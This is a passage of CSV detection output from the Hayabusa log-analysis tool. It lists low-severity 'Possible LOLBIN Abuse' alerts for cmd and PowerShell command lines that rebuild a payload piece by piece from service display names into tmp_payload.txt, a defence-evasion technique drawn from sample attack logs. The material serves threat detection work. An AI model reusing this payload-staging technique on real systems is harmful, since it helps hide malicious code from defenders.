Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | 
User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 